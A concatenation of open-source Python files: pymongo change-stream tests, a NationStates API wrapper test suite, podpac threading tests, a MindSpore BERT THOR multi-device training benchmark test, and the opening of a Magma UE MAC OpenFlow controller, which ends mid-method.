with self.coll.watch(start_after=resume_token,
max_await_time_ms=250) as change_stream:
self.coll.insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
self.assertIsNone(change_stream.try_next())
self.kill_change_stream_cursor(change_stream)
self.coll.insert_one({'_id': 3})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 3})
@client_context.require_no_mongos # Remove after SERVER-41196
@client_context.require_version_min(4, 1, 1)
def test_start_after_resume_process_without_changes(self):
resume_token = self.invalidate_resume_token()
with self.coll.watch(start_after=resume_token,
max_await_time_ms=250) as change_stream:
self.assertIsNone(change_stream.try_next())
self.kill_change_stream_cursor(change_stream)
self.coll.insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
class TestAllScenarios(unittest.TestCase):
@classmethod
@client_context.require_connection
def setUpClass(cls):
cls.listener = WhiteListEventListener("aggregate")
cls.client = rs_or_single_client(event_listeners=[cls.listener])
@classmethod
def tearDownClass(cls):
cls.client.close()
def setUp(self):
self.listener.results.clear()
def setUpCluster(self, scenario_dict):
assets = [
(scenario_dict["database_name"], scenario_dict["collection_name"]),
(scenario_dict["database2_name"], scenario_dict["collection2_name"]),
]
for db, coll in assets:
self.client.drop_database(db)
self.client[db].create_collection(coll)
def tearDown(self):
self.listener.results.clear()
_TEST_PATH = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'change_streams'
)
def camel_to_snake(camel):
# Regex to convert CamelCase to snake_case.
snake = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', camel)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', snake).lower()
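# Usage examples:
#   camel_to_snake('resumeAfter')     -> 'resume_after'
#   camel_to_snake('maxAwaitTimeMS')  -> 'max_await_time_ms'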
def get_change_stream(client, scenario_def, test):
# Get target namespace on which to instantiate change stream
target = test["target"]
if target == "collection":
db = client.get_database(scenario_def["database_name"])
cs_target = db.get_collection(scenario_def["collection_name"])
elif target == "database":
cs_target = client.get_database(scenario_def["database_name"])
elif target == "client":
cs_target = client
else:
raise ValueError("Invalid target in spec")
# Construct change stream kwargs dict
cs_pipeline = test["changeStreamPipeline"]
options = test["changeStreamOptions"]
cs_options = {}
for key, value in iteritems(options):
cs_options[camel_to_snake(key)] = value
# Create and return change stream
return cs_target.watch(pipeline=cs_pipeline, **cs_options)
def run_operation(client, operation):
# Apply specified operations
opname = camel_to_snake(operation["name"])
arguments = operation["arguments"]
cmd = getattr(client.get_database(
operation["database"]).get_collection(
operation["collection"]), opname
)
return cmd(**arguments)
def assert_dict_is_subset(superdict, subdict):
"""Check that subdict is a subset of superdict."""
exempt_fields = ["documentKey", "_id"]
for key, value in iteritems(subdict):
if key not in superdict:
assert False
if isinstance(value, dict):
assert_dict_is_subset(superdict[key], value)
continue
if key in exempt_fields:
superdict[key] = "42"
assert superdict[key] == value
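# e.g. a spec expectation of {'operationType': 'insert', 'documentKey': '42'} matches any
# actual change document with operationType 'insert', because 'documentKey' (like '_id') is
# an exempt field whose real value is replaced with the '42' placeholder before comparison.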
def check_event(event, expectation_dict):
if event is None:
raise AssertionError
for key, value in iteritems(expectation_dict):
if isinstance(value, dict):
assert_dict_is_subset(
getattr(event, key), value
)
else:
assert getattr(event, key) == value
def create_test(scenario_def, test):
def run_scenario(self):
# Set up
self.setUpCluster(scenario_def)
try:
with get_change_stream(
self.client, scenario_def, test
) as change_stream:
for operation in test["operations"]:
# Run specified operations
run_operation(self.client, operation)
num_expected_changes = len(test["result"]["success"])
changes = [
change_stream.next() for _ in range(num_expected_changes)
]
except OperationFailure as exc:
if test["result"].get("error") is None:
raise
expected_code = test["result"]["error"]["code"]
self.assertEqual(exc.code, expected_code)
else:
# Check for expected output from change streams
for change, expected_changes in zip(changes, test["result"]["success"]):
assert_dict_is_subset(change, expected_changes)
self.assertEqual(len(changes), len(test["result"]["success"]))
finally:
# Check for expected events
results = self.listener.results
for expectation in test["expectations"]:
for idx, (event_type, event_desc) in enumerate(iteritems(expectation)):
results_key = event_type.split("_")[1]
event = results[results_key][idx] if len(results[results_key]) > idx else None
check_event(event, event_desc)
return run_scenario
def create_tests():
for dirpath, _, filenames in os.walk(_TEST_PATH):
dirname = os.path.split(dirpath)[-1]
for filename in filenames:
with open(os.path.join(dirpath, filename)) as scenario_stream:
scenario_def = json_util.loads(scenario_stream.read())
test_type = os.path.splitext(filename)[0]
for test in scenario_def['tests']:
new_test = create_test(scenario_def, test)
new_test = client_context.require_no_mmap(new_test)
if 'minServerVersion' in test:
min_ver = tuple(
int(elt) for
elt in test['minServerVersion'].split('.'))
new_test = client_context.require_version_min(*min_ver)(
new_test)
if 'maxServerVersion' in test:
max_ver = tuple(
int(elt) for
elt in test['maxServerVersion'].split('.'))
new_test = client_context.require_version_max(*max_ver)(
new_test)
topologies = test['topology']
new_test = client_context.require_cluster_type(topologies)(
new_test)
test_name = 'test_%s_%s_%s' % (
dirname,
test_type.replace("-", "_"),
str(test['description'].replace(" ", "_")))
new_test.__name__ = test_name
setattr(TestAllScenarios, new_test.__name__, new_test)
create_tests()
if __name__ == '__main__':
unittest.main()
|
test_call.py
|
import unittest
import nationstates as ns
from random import choice
import datetime
USERAGENT = "Automated Testing Builds by Circle CI for the nationstates API wrapper by The United Island Tribes. dolphdevgithub@gmail.com"
import os
test_nation = 'Python Nationstates API wrapper'
test_nation_r = 'pynationstates_telegram_recipient'
PASSWORD = os.environ.get('password')
tgid = os.environ.get('telegram_tgid')
key = os.environ.get('telegram_key')
client_key = os.environ.get('telegram_clientkey')
del os
sep_api = ns.Nationstates(USERAGENT)
joint_api = ns.Nationstates(USERAGENT)
joint_api_enable_beta = ns.Nationstates(USERAGENT, enable_beta=True)
joint_api_use_session = ns.Nationstates(USERAGENT, threading_mode=False)
test_nation_nonauth = joint_api.nation(test_nation)
test_auth_nation = joint_api.nation(test_nation, password=PASSWORD)
test_auth_nation_BETA = joint_api_enable_beta.nation(test_nation, password=PASSWORD)
test_nation_r = joint_api.nation(test_nation_r)
issue_nation_1 = joint_api.nation('Pynationstates Issue Farm 1', password=PASSWORD)
issue_nation_2 = joint_api.nation('Pynationstates Issue Farm 2', password=PASSWORD)
issue_nation_3 = joint_api.nation('Pynationstates Issue Farm 3', password=PASSWORD)
issue_nation_zero = joint_api.nation('pynationstates_0_issues_test_nation', password=PASSWORD)
api_threads = ns.Nationstates(USERAGENT, threading_mode=True)
fake_nation = joint_api.nation('FAKE NATION 1 FAKE NATION 1 FAKE NATION 1 FAKE NATION 1')
fake_region = joint_api.region('FAKE REGION 1 FAKE REGION 1 FAKE REGION 1 FAKE REGION 1')
def grab_id(newfactbookresponse_text):
part1 = newfactbookresponse_text.split('id=')
return part1[1].split('">')[0]
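# Usage sketch (hypothetical response text):
#   grab_id('... <a href="/page=dispatch/id=123456">view</a> ...') -> '123456'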
class SetupCallTest(unittest.TestCase):
def test_create_ns(self):
try:
api = ns.Nationstates(USERAGENT)
except Exception as Err:
self.fail(Err)
class SeperateCallTest(unittest.TestCase):
def test_nation_call(self):
try:
api = sep_api
mycall = api.nation("testlandia")
mycall.get_shards(choice(mycall.auto_shards))
mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_nation_region_calls(self):
try:
api = sep_api
mycall = api.nation("testlandia")
myr = mycall.region
myr.nations
api.world().nations
api.world().regions
api.wa('0').nations
except Exception as Err:
self.fail(Err)
def test_beta(self):
try:
test_auth_nation_BETA._check_beta()
except Exception as Err:
self.fail(Err)
# _check_beta should raise when the API object was created without enable_beta.
with self.assertRaises(Exception):
test_auth_nation._check_beta()
def test_region_call(self):
try:
api = sep_api
mycall = api.region("Balder")
mycall.get_shards(choice(mycall.auto_shards))
mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_world_call(self):
try:
api = sep_api
mycall = api.world()
mycall.get_shards(choice(mycall.auto_shards))
mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_wa_call(self):
try:
api = sep_api
mycall = api.wa("1")
mycall.get_shards(choice(mycall.auto_shards))
mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_cards_indv_call(self):
try:
api = sep_api
mycall = api.cards()
mycall.individual_cards(1, 1)
mycall.individual_cards(1, 1, full_response=True)
mycall.individual_cards(1, 1, 'trades')
mycall.individual_cards(1, 1, ns.Shard('trades'))
mycall.individual_cards(1, 1, (ns.Shard('trades'),))
# mycall.get_shards(choice(mycall.auto_shards))
# mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_cards_decks_call(self):
try:
api = sep_api
mycall = api.cards()
mycall.decks(nation_name='testlandia')
mycall.decks(nation_name='testlandia', full_response=True)
mycall.decks(nation_id=1)
# mycall.get_shards(choice(mycall.auto_shards))
# mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_cards_decks_call_null(self):
api = sep_api
mycall = api.cards()
# decks() requires either nation_name or nation_id, so calling it bare should raise.
with self.assertRaises(Exception):
mycall.decks()
def test_cards_decks_call_both(self):
api = sep_api
mycall = api.cards()
# Supplying both nation_name and nation_id is ambiguous and should raise.
with self.assertRaises(Exception):
mycall.decks(nation_name='testlandia', nation_id=1)
def test_cards_decksinfo_call(self):
try:
api = sep_api
mycall = api.cards()
mycall.deck_owner_info(nation_name='testlandia')
mycall.deck_owner_info(nation_name='testlandia', full_response=True)
mycall.deck_owner_info(nation_id=1)
# mycall.get_shards(choice(mycall.auto_shards))
# mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_cards_asks_and_bids_call(self):
try:
api = sep_api
mycall = api.cards()
mycall.asks_and_bids(nation_name='testlandia')
mycall.asks_and_bids(nation_name='testlandia', full_response=True)
mycall.asks_and_bids(nation_id=1)
# mycall.get_shards(choice(mycall.auto_shards))
# mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_cards_collections_call(self):
try:
api = sep_api
mycall = api.cards()
mycall.collections(nation_name='testlandia')
mycall.collections(nation_name='testlandia', full_response=True)
mycall.collections(nation_id=1)
# mycall.get_shards(choice(mycall.auto_shards))
# mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_cards_auctions_call(self):
try:
api = sep_api
mycall = api.cards()
mycall.auctions()
mycall.auctions(full_response=True)
# mycall.get_shards(choice(mycall.auto_shards))
# mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_cards_trades_call(self):
try:
api = sep_api
mycall = api.cards()
mycall.trades()
mycall.trades(full_response=True)
mycall.collections(nation_id=1)
# mycall.get_shards(choice(mycall.auto_shards))
# mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_auto_shard_static_n(self):
try:
api = sep_api
mycall = api.nation("testlandia")
mycall.fullname
except Exception as Err:
self.fail(Err)
def test_auto_shard_static_r(self):
try:
api = sep_api
mycall = api.region("balder")
mycall.numnations
except Exception as Err:
self.fail(Err)
def test_auto_shard_static_w(self):
try:
api = sep_api
mycall = api.world()
mycall.numnations
except Exception as Err:
self.fail(Err)
def test_auto_shard_static_wa(self):
try:
api = sep_api
mycall = api.wa("1")
mycall.numnations
except Exception as Err:
self.fail(Err)
class ApiJoinTest(unittest.TestCase):
def test_private_nation(self):
try:
test_auth_nation.get_shards('ping')
except Exception as Err:
self.fail(Err)
def test_exists(self):
assert fake_nation.exists() is False
assert fake_region.exists() is False
assert test_auth_nation.exists()
assert fake_nation.exists() is False
assert test_auth_nation.region.exists()
def test_create_dispatch(self):
from datetime import datetime
now = datetime.now
try:
resp = test_auth_nation_BETA.create_dispatch(title='AUTOMATED ADD DISPATCH TEST', text=str(now()), category=1, subcategory=105, full_response=True)
dispatch_id = grab_id(resp['data']['nation']['success'])
resp = test_auth_nation_BETA.remove_dispatch(dispatch_id=dispatch_id, full_response=True)
resp = test_auth_nation_BETA.create_dispatch(title='AUTOMATED ADD DISPATCH TEST', text=str(now()), category=1, subcategory=105, full_response=False)
dispatch_id = grab_id(resp.success)
resp = test_auth_nation_BETA.remove_dispatch(dispatch_id=dispatch_id, full_response=True)
except Exception as Err:
self.fail(Err)
def test_edit_dispatch(self):
from datetime import datetime
now = datetime.now
try:
resp = test_auth_nation_BETA.create_dispatch(title='AUTOMATED ADD DISPATCH EDIT TEST', text=str(now()), category=1, subcategory=105, full_response=False)
dispatch_id = grab_id(resp.success)
resp = test_auth_nation_BETA.edit_dispatch(dispatch_id=dispatch_id, title='EDIT TEST', text="THIS POST WAS LAST EDITED AT:" + str(now()), category=1, subcategory=111, full_response=False)
resp = test_auth_nation_BETA.remove_dispatch(dispatch_id=dispatch_id, full_response=True)
resp = test_auth_nation_BETA.create_dispatch(title='AUTOMATED ADD DISPATCH EDIT TEST', text=str(now()), category=1, subcategory=105, full_response=False)
dispatch_id = grab_id(resp.success)
resp = test_auth_nation_BETA.edit_dispatch(dispatch_id=dispatch_id, title='EDIT TEST', text="THIS POST WAS LAST EDITED AT:" + str(now()), category=1, subcategory=111, full_response=True)
resp = test_auth_nation_BETA.remove_dispatch(dispatch_id=dispatch_id, full_response=True)
except Exception as Err:
self.fail(Err)
def test_remove_dispatch(self):
from datetime import datetime
now = datetime.now
try:
resp = test_auth_nation_BETA.create_dispatch(title='AUTOMATED ADD DISPATCH REMOVE TEST', text=str(now()), category=1, subcategory=105, full_response=False)
dispatch_id = grab_id(resp.success)
resp = test_auth_nation_BETA.remove_dispatch(dispatch_id=dispatch_id)
resp = test_auth_nation_BETA.create_dispatch(title='AUTOMATED ADD DISPATCH REMOVE TEST', text=str(now()), category=1, subcategory=105, full_response=False)
dispatch_id = grab_id(resp.success)
resp = test_auth_nation_BETA.remove_dispatch(dispatch_id=dispatch_id, full_response=True)
except Exception as Err:
self.fail(Err)
    def test_remove_dispatch_invalid(self):
from datetime import datetime
now = datetime.now
try:
resp = test_auth_nation_BETA.remove_dispatch(dispatch_id=None, full_response=True)
            self.fail('should have failed')
except Exception as Err:
pass
def test_send_rmb(self):
from datetime import datetime
now = datetime.now
try:
test_auth_nation_BETA.send_rmb(test_auth_nation.region, 'Circle CI: Automated Test')
except Exception as Err:
self.fail(Err)
def test_telegram_send(self):
from datetime import datetime
import time
now = datetime.now
try:
telegram = joint_api.telegram(tgid=tgid, key=key, client_key=client_key)
test_nation_r.send_telegram(telegram)
try:
test_nation_r.send_telegram(telegram)
                self.fail('API was supposed to block this')
except ns.nsapiwrapper.exceptions.APIRateLimitBan:
pass
try:
telegram.send_telegram(test_nation_r.name)
except ns.nsapiwrapper.exceptions.APIRateLimitBan:
                # Just testing that the code path works - too much wasted time to wait 30 seconds
pass
except Exception as Err:
raise (Err)
def test_pick_issue_always_fail(self):
resp = issue_nation_zero.get_shards('issues')
if resp.issues is None:
pass
else:
self.fail('Nation should have no issues')
def test_pick_issue(self):
import random
def pick_random_nation(*apis):
for api in apis:
resp = api.get_shards('issues')
if resp.issues is None:
continue
random_issue = random.choice(resp.issues.issue)
random_issue_id = random_issue.id
random_option_choice = random.choice(random_issue.option).id
(api.pick_issue(random_issue_id, random_option_choice))
break
nations = [issue_nation_1, issue_nation_2, issue_nation_3]
random.shuffle(nations)
pick_random_nation(*nations)
def test_threads(self):
import threading
import time
nation = api_threads.nation('testlandia')
def HelloWorld():
"""User defined Thread function"""
nation.flag
return
def Main():
            threads = []  # keep the started threads so we can join them all below
for i in range(5):
mythread = threading.Thread(target=HelloWorld)
threads.append(mythread)
mythread.start()
for row in threads:
row.join()
assert (nation.api_mother.api.__activerequests__) == 0
Main()
|
test_multithreading.py
|
import os
import sys
import time
from threading import Thread
import pytest
from podpac import settings
from podpac.core.managers.multi_threading import FakeLock, thread_manager
class TestFakeLock(object):
def test_enter_exist_single_thread(self):
lock = FakeLock()
assert lock._locked == False
with lock:
assert lock._locked
assert lock._locked == False
def test_fake_lock_multithreaded(self):
lock = FakeLock()
def f(s):
print("In", s)
with lock:
print("Locked", s)
assert lock._locked
time.sleep(0.05)
print("Unlocked", s)
assert lock._locked == False
if sys.version_info.major == 2:
t1 = Thread(target=lambda: f("thread"))
t2 = Thread(target=lambda: f("thread"))
t1.daemon = True
t2.daemon = True
else:
t1 = Thread(target=lambda: f("thread"), daemon=True)
t2 = Thread(target=lambda: f("thread"), daemon=True)
print("In Main Thread")
f("main1")
print("Starting Thread")
t1.run()
t2.run()
f("main2")
class TestThreadManager(object):
def test_request_release_threads_single_threaded(self):
with settings:
settings["N_THREADS"] = 5
# Requests
n = thread_manager.request_n_threads(3)
assert n == 3
n = thread_manager.request_n_threads(3)
assert n == 2
n = thread_manager.request_n_threads(3)
assert n == 0
# releases
assert thread_manager._n_threads_used == 5
n = thread_manager.release_n_threads(3)
assert n == 3
n = thread_manager.release_n_threads(2)
assert n == 5
n = thread_manager.release_n_threads(50)
assert n == 5
def test_request_release_threads_multi_threaded(self):
def f(s):
print("In", s)
n1 = thread_manager.release_n_threads(s)
time.sleep(0.05)
n2 = thread_manager.release_n_threads(s)
print("Released", s)
assert n2 >= n1
with settings:
settings["N_THREADS"] = 7
if sys.version_info.major == 2:
t1 = Thread(target=lambda: f(5))
t2 = Thread(target=lambda: f(6))
t1.daemon = True
t2.daemon = True
else:
t1 = Thread(target=lambda: f(5), daemon=True)
t2 = Thread(target=lambda: f(6), daemon=True)
f(1)
t1.run()
t2.run()
f(7)
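# Minimal usage sketch (values are arbitrary) for thread_manager as exercised
# above: request up to N threads for a parallel task, then release them when
# the work is finished.
def _thread_manager_usage_sketch():
    with settings:
        settings["N_THREADS"] = 4
        granted = thread_manager.request_n_threads(8)  # capped by N_THREADS
        try:
            pass  # ... run `granted` workers here ...
        finally:
            thread_manager.release_n_threads(granted)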
|
test_bert_thor_mlperf.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""test bert thor performance with 8p on mlperf dataset"""
import os
import time
from multiprocessing import Process, Queue
import pytest
import numpy as np
import mindspore.dataset as ds
import mindspore.common.dtype as mstype
import mindspore.communication.management as D
from mindspore import context
from mindspore import log as logger
from mindspore.train.callback import Callback
from mindspore.context import ParallelMode
from mindspore.train.serialization import load_checkpoint, load_param_into_net
import mindspore.dataset.transforms.c_transforms as C
from model_zoo.official.nlp.bert_thor.src.bert_for_pre_training import BertNetworkWithLoss, BertTrainOneStepCell
from model_zoo.official.nlp.bert_thor.src.bert_net_config import bert_net_cfg
from model_zoo.official.nlp.bert_thor.src.config import cfg
from model_zoo.official.nlp.bert_thor.src.lr_generator import get_bert_lr, get_bert_damping
from model_zoo.official.nlp.bert_thor.src.model_thor import Model
from model_zoo.official.nlp.bert_thor.src.thor_for_bert_arg import THOR
MINDSPORE_HCCL_CONFIG_PATH = "/home/workspace/mindspore_config/hccl/rank_table_8p.json"
DATASET_PATH = "/home/workspace/mindspore_dataset/bert/thor/en-wiki-512_test_first1wan"
load_checkpoint_path = ""
data_sink_steps = 100
train_steps = 200
batch_size = 12
np.random.seed(1)
ds.config.set_seed(1)
os.environ['GLOG_v'] = str(2)
class TimeMonitor(Callback):
"""Time Monitor."""
def __init__(self, data_size):
super(TimeMonitor, self).__init__()
self.data_size = data_size
self.epoch_mseconds_list = []
self.per_step_mseconds_list = []
def epoch_begin(self, run_context):
self.epoch_time = time.time()
def epoch_end(self, run_context):
cb_params = run_context.original_args()
epoch_mseconds = (time.time() - self.epoch_time) * 1000
self.epoch_mseconds_list.append(epoch_mseconds)
per_step_mseconds = epoch_mseconds / self.data_size
self.per_step_mseconds_list.append(per_step_mseconds)
print("epoch: {}, per_step_mseconds are {}".format(cb_params.cur_epoch_num, str(per_step_mseconds)), flush=True)
class LossCallback(Callback):
def __init__(self):
super(LossCallback, self).__init__()
self.loss_list = []
def epoch_end(self, run_context):
cb_params = run_context.original_args()
self.loss_list.append(cb_params.net_outputs.asnumpy())
print("epoch: {}, step: {}, outputs are {}".format(cb_params.cur_epoch_num, cb_params.cur_step_num,
str(cb_params.net_outputs)), flush=True)
def create_bert_dataset(device_num=1, rank=0, do_shuffle="true", data_dir=None, schema_dir=None):
"""create train dataset"""
# apply repeat operations
files = os.listdir(data_dir)
data_files = []
for file_name in files:
if "tfrecord" in file_name:
data_files.append(os.path.join(data_dir, file_name))
data_files = sorted(data_files)
data_set = ds.TFRecordDataset(data_files, schema_dir if schema_dir != "" else None,
columns_list=["input_ids", "input_mask", "segment_ids", "next_sentence_labels",
"masked_lm_positions", "masked_lm_ids", "masked_lm_weights"],
shuffle=ds.Shuffle.FILES if do_shuffle == "true" else False,
num_shards=device_num, shard_id=rank, shard_equal_rows=True)
ori_dataset_size = data_set.get_dataset_size()
print('origin dataset size: ', ori_dataset_size)
type_cast_op = C.TypeCast(mstype.int32)
data_set = data_set.map(operations=type_cast_op, input_columns="masked_lm_ids")
data_set = data_set.map(operations=type_cast_op, input_columns="masked_lm_positions")
data_set = data_set.map(operations=type_cast_op, input_columns="next_sentence_labels")
data_set = data_set.map(operations=type_cast_op, input_columns="segment_ids")
data_set = data_set.map(operations=type_cast_op, input_columns="input_mask")
data_set = data_set.map(operations=type_cast_op, input_columns="input_ids")
# apply batch operations
data_set = data_set.batch(batch_size, drop_remainder=True)
logger.info("data size: {}".format(data_set.get_dataset_size()))
logger.info("repeat count: {}".format(data_set.get_repeat_count()))
return data_set
def _set_bert_all_reduce_split():
"""set bert all_reduce fusion split, support num_hidden_layers is 12 and 24."""
from mindspore.parallel._auto_parallel_context import auto_parallel_context
if bert_net_cfg.num_hidden_layers == 12:
if bert_net_cfg.use_relative_positions:
auto_parallel_context().set_all_reduce_fusion_split_indices([29, 58, 87, 116, 145, 174, 203, 217],
"hccl_world_groupsum1")
auto_parallel_context().set_all_reduce_fusion_split_indices([29, 58, 87, 116, 145, 174, 203, 217],
"hccl_world_groupsum3")
else:
auto_parallel_context().set_all_reduce_fusion_split_indices([28, 55, 82, 109, 136, 163, 190, 205],
"hccl_world_groupsum1")
auto_parallel_context().set_all_reduce_fusion_split_indices([28, 55, 82, 109, 136, 163, 190, 205],
"hccl_world_groupsum3")
elif bert_net_cfg.num_hidden_layers == 24:
if bert_net_cfg.use_relative_positions:
auto_parallel_context().set_all_reduce_fusion_split_indices([30, 90, 150, 210, 270, 330, 390, 421],
"hccl_world_groupsum1")
auto_parallel_context().set_all_reduce_fusion_split_indices([30, 90, 150, 210, 270, 330, 390, 421],
"hccl_world_groupsum3")
else:
auto_parallel_context().set_all_reduce_fusion_split_indices([38, 77], "hccl_world_groupsum1")
auto_parallel_context().set_all_reduce_fusion_split_indices([38, 77], "hccl_world_groupsum3")
def train_process_bert_thor(q, device_id, epoch_size, device_num):
os.system("mkdir " + str(device_id))
os.chdir(str(device_id))
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend", device_id=device_id, save_graphs=False)
context.set_context(reserve_class_name_in_scope=False)
context.set_context(max_call_depth=3000)
os.environ['MINDSPORE_HCCL_CONFIG_PATH'] = MINDSPORE_HCCL_CONFIG_PATH
os.environ['RANK_ID'] = str(device_id)
os.environ['RANK_SIZE'] = str(device_num)
D.init()
rank = device_id % device_num
context.reset_auto_parallel_context()
_set_bert_all_reduce_split()
context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=True,
device_num=device_num)
bert_net_cfg.num_hidden_layers = 4
data_set = create_bert_dataset(device_num=device_num, rank=rank, do_shuffle=False, data_dir=DATASET_PATH,
schema_dir=None)
net_with_loss = BertNetworkWithLoss(bert_net_cfg, True)
new_repeat_count = epoch_size * data_set.get_dataset_size() // data_sink_steps
new_repeat_count = min(new_repeat_count, train_steps // data_sink_steps)
lr = get_bert_lr()
damping = get_bert_damping()
optimizer = THOR(filter(lambda x: x.requires_grad, net_with_loss.get_parameters()), lr, cfg.Thor.momentum,
filter(lambda x: 'matrix_A' in x.name, net_with_loss.get_parameters()),
filter(lambda x: 'matrix_G' in x.name, net_with_loss.get_parameters()),
cfg.Thor.weight_decay, cfg.Thor.loss_scale, bert_net_cfg.num_hidden_layers,
bert_net_cfg.batch_size, damping)
time_monitor_callback = TimeMonitor(data_sink_steps)
loss_callback = LossCallback()
callback = [time_monitor_callback, loss_callback]
if load_checkpoint_path:
param_dict = load_checkpoint(load_checkpoint_path)
load_param_into_net(net_with_loss, param_dict)
net_with_grads = BertTrainOneStepCell(net_with_loss, optimizer=optimizer)
model = Model(net_with_grads, frequency=cfg.Thor.frequency)
model.train(new_repeat_count, data_set, callbacks=callback, dataset_sink_mode=True, sink_size=data_sink_steps)
loss_list = loss_callback.loss_list
per_step_mseconds = time_monitor_callback.per_step_mseconds_list
q.put({'loss': loss_list, 'cost': per_step_mseconds})
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_single
def test_bert_thor_mlperf_8p():
"""test bert thor mlperf 8p"""
q = Queue()
device_num = 8
epoch_size = 2
process = []
for i in range(device_num):
device_id = i
process.append(Process(target=train_process_bert_thor, args=(q, device_id, epoch_size, device_num)))
for i in range(device_num):
process[i].start()
print("Waiting for all subprocesses done...")
for i in range(device_num):
process[i].join()
sum_loss_list = []
sum_cost_list = []
for _ in range(train_steps // data_sink_steps):
sum_loss_list.append(0.0)
sum_cost_list.append(0.0)
for _ in range(device_num):
output = q.get()
loss_list = output['loss']
cost_list = output['cost']
sum_loss_list = np.sum([loss_list, sum_loss_list], axis=0)
sum_cost_list = np.sum([cost_list, sum_cost_list], axis=0)
for j in range(train_steps // data_sink_steps):
print("epoch: ", j, "sum_loss: ", sum_loss_list[j], "sum_cost: ", sum_cost_list[j])
mean_loss = sum_loss_list[-1] / device_num
mean_cost = sum_cost_list[-1] / device_num
for i in range(device_num):
os.system("rm -rf " + str(i))
print("End training...")
assert mean_cost < 64.2
assert mean_loss < 7.9
if __name__ == '__main__':
test_bert_thor_mlperf_8p()
|
ue_mac.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import threading
from typing import List
from lte.protos.pipelined_pb2 import (
FlowResponse,
SetupFlowsResult,
UEMacFlowRequest,
)
from magma.pipelined.app.base import ControllerType, MagmaController
from magma.pipelined.app.inout import INGRESS
from magma.pipelined.app.ipfix import IPFIXController
from magma.pipelined.bridge_util import BridgeTools
from magma.pipelined.directoryd_client import update_record
from magma.pipelined.imsi import decode_imsi, encode_imsi
from magma.pipelined.openflow import flows
from magma.pipelined.openflow.exceptions import MagmaOFError
from magma.pipelined.openflow.magma_match import MagmaMatch
from magma.pipelined.openflow.registers import IMSI_REG, load_passthrough
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER, set_ev_cls
from ryu.lib.packet import dhcp, ether_types, packet
from ryu.ofproto.inet import IPPROTO_TCP, IPPROTO_UDP
class UEMacAddressController(MagmaController):
"""
UE MAC Address Controller
This controller controls table 0 which is the first table every packet
touches. It matches on UE MAC address and sets IMSI metadata
"""
APP_NAME = "ue_mac"
APP_TYPE = ControllerType.SPECIAL
def __init__(self, *args, **kwargs):
super(UEMacAddressController, self).__init__(*args, **kwargs)
self.tbl_num = self._service_manager.get_table_num(self.APP_NAME)
self.next_table = \
self._service_manager.get_table_num(INGRESS)
self.arpd_controller_fut = kwargs['app_futures']['arpd']
self.arp_contoller = None
self._loop = kwargs['loop']
self._datapath = None
tbls = self._service_manager.allocate_scratch_tables(self.APP_NAME, 2)
self._passthrough_set_tbl = tbls[0]
self._dhcp_learn_scratch = tbls[1]
self._li_port = None
self._imsi_set_tbl_num = \
self._service_manager.INTERNAL_IMSI_SET_TABLE_NUM
self._ipfix_sample_tbl_num = \
self._service_manager.INTERNAL_IPFIX_SAMPLE_TABLE_NUM
self._app_set_tbl_num = self._service_manager.INTERNAL_APP_SET_TABLE_NUM
if 'li_local_iface' in kwargs['config']:
self._li_port = \
BridgeTools.get_ofport(kwargs['config']['li_local_iface'])
self._dpi_port = \
BridgeTools.get_ofport(kwargs['config']['dpi']['mon_port'])
def initialize_on_connect(self, datapath):
self.delete_all_flows(datapath)
self._datapath = datapath
self._install_default_flows()
def cleanup_on_disconnect(self, datapath):
self.delete_all_flows(datapath)
def handle_restart(self, ue_requests: List[UEMacFlowRequest]
) -> SetupFlowsResult:
"""
        Re-install UE MAC flows for the given UE requests after a restart.
"""
        # TODO: We could potentially diff against existing flows instead, but
        # there is little benefit (we don't need stats here)
self.delete_all_flows(self._datapath)
self._install_default_flows()
for ue_req in ue_requests:
self.add_ue_mac_flow(ue_req.sid.id, ue_req.mac_addr)
self._loop.call_soon_threadsafe(self._setup_arp, ue_requests)
self.init_finished = True
return SetupFlowsResult(result=SetupFlowsResult.SUCCESS)
def _setup_arp(self, ue_requests: List[UEMacFlowRequest]):
if self.arp_contoller or self.arpd_controller_fut.done():
